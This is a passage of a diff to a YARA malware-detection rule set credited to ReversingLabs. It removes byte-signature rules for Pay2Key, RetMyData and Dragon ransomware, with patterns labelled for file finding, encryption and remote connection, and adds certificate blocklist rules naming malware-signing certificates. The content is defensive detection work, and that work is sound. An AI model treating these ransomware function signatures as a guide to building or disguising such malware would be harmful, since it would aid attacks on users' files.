-            8B EC 83 EC ?? 53 56 57 33 F6 56 56 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 89
-            75 ?? 39 75 ?? 7C ?? B8 ?? ?? ?? ?? 7F ?? 39 45 ?? 76 ?? 89 45 ?? 8B D8 56 53 56 6A
-            ?? 56 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? FF 75 ?? 56 56 6A ?? 50 FF 15 ?? ??
-            ?? ?? 8B F8 3B FE 74 ?? 53 8D 45 ?? 50 8B 45 ?? 57 56 FF 75 ?? 56 FF 70 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B C9 C2 ?? ?? 8B 45 ?? 89 45 ?? C1
-            E8 ?? 8D 58 ?? C7 45 ?? ?? ?? ?? ?? C1 E3 ?? E9
-        }
-		$main = {
-            55 8B EC 8B 45 ?? 53 56 8B 35 ?? ?? ?? ?? 57 BF ?? ?? ?? ?? 57 6A ?? BB ?? ?? ?? ??
-            53 83 C0 ?? 6A ?? 50 FF D6 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 57 6A
-            ?? 6A ?? EB ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 6A ?? 53 8B 45 ?? 6A ?? 83 C0 ?? 50 FF D6
-            85 C0 74 ?? 8B 75 ?? 8B C6 E8 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? 56 E8 ?? ?? ?? ?? 56
-            E8 ?? ?? ?? ?? FF 76 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? EB ?? 8B
-            75 ?? 56 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 5D C2
-        }
-		$encryption_loop = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 8B 46 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? 66 8B 10
-            66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85
-            D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24
-            ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83
-            C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ??
-            50 FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44
-            24 ?? ?? 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            FF D3 85 C0 75 ?? 8B 45 ?? 56 48 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8D
-            44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 31 83 C1 ?? 66 85 F6 75 ??
-            2B CA D1 F9 8D 4C 4C ?? 3B C1 74 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 74 ?? FF 75
-            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 5B 8B E5 5D C2
-        }
-		$shutdown = {
-            68 ?? ?? ?? ?? 8B CA 8B D0 0F B7 45 ?? 03 C2 33 D2 F7 F6 0F B7 75 ?? 8D 85 ?? ?? ??
-            ?? 50 03 F1 8B FA FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? F6 05 ?? ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 56 57 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 57
-            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 5F 5E 8B C3 5B C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Direct Systems Ltd" and pe.signatures [ i ] . serial == "36:a7:7d:37:e6:8e:02:fd:3d:04:3c:71:97:e0:44:ca" and 1515542400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f014b446-0ddc-51df-898c-200bd60181a0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14040-L14056"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d79ab926cbc0049d39f5f4c6e57afc71b1a30311a4816fdb66a9c2e257cc84af"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_file and $main and $encryption_loop and $shutdown
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecnopolis Consulting Ltd" and pe.signatures [ i ] . serial == "73:bf:f2:fb:71:4f:98:6c:17:07:16:5f:0b:0f:2e:0e" and 1090886400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Pay2Key : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Pay2Key ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2e482222-0483-5fe3-bb87-cfadda8e7e7a"
-		date = "2021-04-14"
-		modified = "2021-04-14"
+		id = "c02d7aaf-e88a-5aba-a8ee-db34562e53b1"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Pay2Key.yara#L1-L99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14058-L14074"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2497504f3afc99523cb29e51652a24f4374316d57d4baf5cde8d22e75a425585"
+		logic_hash = "795bcb46b41ded084e4d12d98e335748ec1db3e0abbbb2d933e819d955075138"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Pay2Key"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
-            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
-            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
-            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
-            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
-            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
-            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
-            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
-            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
-            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 43 ?? 2B 43 ?? 75 ?? 8B 75 ?? 8B 45 ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? 89 06 89 4E
-            ?? 8B 4D ?? 89 4E ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? 83 7B ?? ?? 74
-            ?? 8B 45 ?? 2B 45 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 8B 55 ?? 2B F2 56 52 57 E8 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
-            56 89 75 ?? E8 ?? ?? ?? ?? 56 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 83 C4
-            ?? 50 56 6A ?? 6A ?? 6A ?? FF 73 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 85 C0 75 ?? 8B 75 ??
-            89 45 ?? 89 45 ?? 89 45 ?? 89 06 89 46 ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? FF 75 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 56 8B 75 ?? 56 E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 4D ?? 8B 45
-            ?? C7 45 ?? ?? ?? ?? ?? 89 4F ?? 8D 4D ?? 89 37 89 47 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 5B 8B E5 5D C2
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7
-            45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 56 57 FF 15 ?? ?? ?? ??
-            8B 75 ?? 8B C8 8B D6 E8 ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? 8B CE
-            E8 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB
-            ?? 81 F9 ?? ?? ?? ?? 74 ?? 81 F9 ?? ?? ?? ?? 74 ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5
-            5D C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 51 53 56 8B F1 57 8B 46 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 80 7D ?? ?? 6A ??
-            74 ?? 8B 4E ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 45 ?? 8B 08
-            83 F9 ?? 75 ?? 8B 4E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ??
-            ?? 8B 45 ?? 8B 7D ?? 57 89 45 ?? 8D 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75
-            ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 8B D8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? B8 ?? ?? ??
-            ?? EB ?? 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C1 85 DB 74 ?? 3D ?? ?? ?? ?? 74 ?? FF
-            75 ?? 8B 4E ?? 50 57 E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 4E ?? 57 E8 ?? ?? ??
-            ?? 5F 5E 5B 59 5D C2
-        }
-		$remote_connection_p3 = {
-            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45
-            ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B C8 8B D6 E8
-            ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ??
-            68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "33:b2:41:70:69:4c:a0:cf:4d:2b:df:4a:ad:f4:75:a3" and 1474934400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "56f62454-84a1-5843-b2f4-fa84b37040f3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14076-L14092"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "ea9bc11efd2969f6b7112338f2b084ea3551e072e46b1162bd47b08be549cdd4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" and 1556582400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Retmydata : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RetMyData ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7a091d9-7ace-5aad-95b4-d5101fa7fdea"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "dae6b474-e4f0-5c73-b32e-d2680f508799"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RetMyData.yara#L1-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14094-L14110"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "54ce38d75e9ab82a77b9c338f75e180e19ac745f149289c7478a4aa3b44d70fd"
+		logic_hash = "0f88989c64bece23e7eccf8022e038fdd9c360766de71268cf71616f74adc56c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RetMyData"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 9D ?? ?? ?? ?? 8B 04 04
-            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 40 51 51 0F 84 ?? ?? ?? ?? 8D
-            B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85
-            C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ??
-            ?? ?? 89 74 24 ?? 89 7C 24 ?? 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ??
-            89 D8 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 89 D8 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 D8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44
-            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 0F 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F 5D C3 55 BA ?? ?? ?? ?? 89
-            E5 53 51 89 C3 E8 ?? ?? ?? ?? 48 74 ?? 5A 89 D8 5B 5D E9 ?? ?? ?? ?? 58 5B 5D C3
-        }
-		$enum_resources = {
-            55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 95 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B 04 04 C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ??
-            83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 31 F6 89
-            44 24 ?? 8D 85 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 83 EC ?? 3B B5 ?? ?? ?? ?? 7D ?? 83 7B ?? ?? 75 ?? 8B 43 ?? C7 44 24 ?? ??
-            ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F8 E8 ?? ?? ?? ?? 89 D8 46 83 C3 ??
-            E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F
-            5D C3
-        }
-		$encrypt_files = {
-            55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            C0 89 C2 A3 ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31
-            C0 89 D7 F3 AB 85 DB 75 ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 5C 24 ?? 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 3C
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34
-            24 E8 ?? ?? ?? ?? 89 74 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 EC
-            ?? 83 F8 ?? 89 C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 89 7C 24 ?? 89 34 24 EB ?? 8D
-            BD ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 89
-            1C 24 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? EB ?? F7 D8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ??
-            89 1C 24 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 EC ?? BA ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            74 24 ?? 89 1C 24 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 EC ??
-            FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funbit" and pe.signatures [ i ] . serial == "7c:ad:9c:37:f7:af:fa:8f:4d:82:29:f9:76:07:e2:65" and 1122508800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4604f1a6-2fdb-5917-943d-f0e2dbaaa29e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14112-L14128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "5e203f87dd4608ba5d583e02ce86fbe230e45fff86a7a697766e149d0cf6f436"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELECTRONIC GROUP" and pe.signatures [ i ] . serial == "09:8a:57" and 1032855179 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dragon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dragon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dbeab955-f1fe-57eb-a9a4-c8c885ab7fad"
-		date = "2020-10-30"
-		modified = "2020-10-30"
+		id = "973aaf33-25a2-5f40-a5a7-d9f77e3589b3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Dragon.yara#L1-L149"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14130-L14146"
